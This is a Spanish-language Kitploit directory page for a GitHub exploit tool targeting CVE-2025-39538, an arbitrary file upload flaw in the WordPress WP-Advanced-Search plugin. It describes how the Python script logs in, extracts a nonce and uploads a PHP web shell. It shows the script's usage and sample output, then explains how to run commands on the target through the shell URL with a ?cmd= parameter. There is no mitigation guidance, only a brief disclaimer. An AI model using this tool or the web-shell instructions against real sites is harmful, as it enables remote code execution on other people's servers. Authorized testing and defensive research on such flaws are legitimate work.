Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilidad de subida de archivos arbitraria | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-39538
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - Vulnerabilidad de subida de archivos arbitraria

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 Subida Arbitraria de Archivos

CVE-2025-39538
Publicado: 2025-04-16
Tipo de Vulnerabilidad: Subida Arbitraria de Archivos (Subida sin Restricciones de Archivos con Tipo Peligroso)
Plugin Afectado: WP-Advanced-Search por Mathieu Chartier
Versiones Afectadas: Todas las versiones hasta la 3.3.9.3 inclusive

Esta vulnerabilidad permite a un atacante autenticado subir un archivo PHP malicioso (como un web shell) al servidor mediante la funcionalidad de importación proporcionada por el plugin. El archivo subido se coloca en el directorio de subidas de WordPress y podría provocar la ejecución remota de código.

🧱 Ruta de subida:

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ Acerca del Script de Explotación

Este script de Python realiza las siguientes acciones:

  1. Inicia sesión en el sitio WordPress con las credenciales proporcionadas.
  2. Extrae el wp_advanced_search_up_nonce requerido de la página de administración de importación/exportación.
  3. Sube un web shell (archivo PHP) mediante una solicitud POST manipulada.

🚀 Uso

root@kitploit:~
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

🖥️ Ejemplo de Salida:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).

🐚 Uso del Shell Subido

Después de la subida, puedes acceder a tu shell de esta manera:

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

Reemplaza whoami con cualquier comando de Linux que quieras ejecutar, por ejemplo:

  • id — muestra el ID del usuario actual.
  • pwd — muestra el directorio actual.
  • ls — lista los archivos.

⚠️ Descargo de Responsabilidad


Esta herramienta está destinada únicamente a pruebas de seguridad educativas y autorizadas.
El autor no es responsable de ningún uso indebido o daño causado por este script.


Por: Nxploited | Khaled Alenazi

Descargar herramienta